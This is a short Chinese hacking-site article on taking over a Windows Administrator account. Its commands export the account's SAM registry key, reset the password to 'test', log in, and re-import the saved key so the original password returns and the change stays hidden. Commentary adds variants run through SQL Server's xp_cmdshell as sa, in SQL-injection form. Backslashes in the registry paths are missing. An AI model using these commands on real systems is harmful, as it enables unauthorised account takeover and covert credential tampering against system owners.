频道栏目
首页 > 资讯 > 系统安全 > 正文

导出管理员密码文件

08-12-26        来源:[db:作者]  
收藏   我要投稿

来源:红狼

sa默认可以读sam键.应该。
reg export HKLMSAMSAMDomainsAccountUsers00001F4 c:old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:old.reg
根本不用克隆.
找到对应的sid.

/*不狐:这则经验非常不错,前面我做过一次渗透就没想到可以这样来!

默认情况下sa继承system权限,对sam键值有完全控制权限。

SQL代码
exec master..xp_cmdshell "reg export HKLMSAMSAMDomainsAccountUsers00001F4 c:old.reg"--  
或者

SQL代码
exec master..xp_cmdshell "regedit -e C:1.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4"--  
都是可行的。

相关TAG标签
上一篇:黑客盗取网站80万点卡获刑13年
下一篇:两个简易VBS脚本结束进程与防止进程启动
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站